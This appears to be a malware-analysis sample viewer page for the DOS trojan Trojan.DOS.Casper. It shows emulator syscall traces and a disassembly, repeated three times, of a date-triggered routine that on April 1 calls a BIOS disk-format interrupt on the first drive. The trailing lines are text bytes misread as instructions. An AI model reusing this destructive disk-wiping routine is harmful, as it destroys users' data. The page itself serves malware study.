Sample viewer

vx.netlux.org/Trojan.DOS.Casper

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:06:08.594388142Z 42 PC: 12a44 | Get date 0x12a44: cmp dx, 0x401
0x12a48: jne 0x12a59
0x12a4a: mov ax, 0x515
0x12a4d: mov ch, 0
0x12a4f: mov dx, 0
0x12a52: mov es, dx
0x12a54: mov bx, 0
0x12a57: int 0x13
0x12a59: int 0x20
0x12a5b: dec ax
0x12a5c: imul sp, word ptr [bx + di], 0x4920
0x12a60: daa
0x12a61: insw word ptr es:[di], dx
0x12a62: and byte ptr [bp + di + 0x61], al
0x12a65: jae 0x12ad7
0x12a67: jb 0x12a8a
0x12a6a: push sp
0x12a6b: push 0x2065
0x12a6e: push si
0x12a6f: imul si, word ptr [bp + si + 0x75], 0x2c73

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15443,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:29.627882051Z 42 PC: 12a44 | Get date 0x12a44: cmp dx, 0x401
0x12a48: jne 0x12a59
0x12a4a: mov ax, 0x515
0x12a4d: mov ch, 0
0x12a4f: mov dx, 0
0x12a52: mov es, dx
0x12a54: mov bx, 0
0x12a57: int 0x13
0x12a59: int 0x20
0x12a5b: dec ax
0x12a5c: imul sp, word ptr [bx + di], 0x4920
0x12a60: daa
0x12a61: insw word ptr es:[di], dx
0x12a62: and byte ptr [bp + di + 0x61], al
0x12a65: jae 0x12ad7
0x12a67: jb 0x12a8a
0x12a6a: push sp
0x12a6b: push 0x2065
0x12a6e: push si
0x12a6f: imul si, word ptr [bp + si + 0x75], 0x2c73

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":15443,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:43:30.091783212Z 42 PC: 12a44 | Get date 0x12a44: cmp dx, 0x401
0x12a48: jne 0x12a59
0x12a4a: mov ax, 0x515
0x12a4d: mov ch, 0
0x12a4f: mov dx, 0
0x12a52: mov es, dx
0x12a54: mov bx, 0
0x12a57: int 0x13
0x12a59: int 0x20
0x12a5b: dec ax
0x12a5c: imul sp, word ptr [bx + di], 0x4920
0x12a60: daa
0x12a61: insw word ptr es:[di], dx
0x12a62: and byte ptr [bp + di + 0x61], al
0x12a65: jae 0x12ad7
0x12a67: jb 0x12a8a
0x12a6a: push sp
0x12a6b: push 0x2065
0x12a6e: push si
0x12a6f: imul si, word ptr [bp + si + 0x75], 0x2c73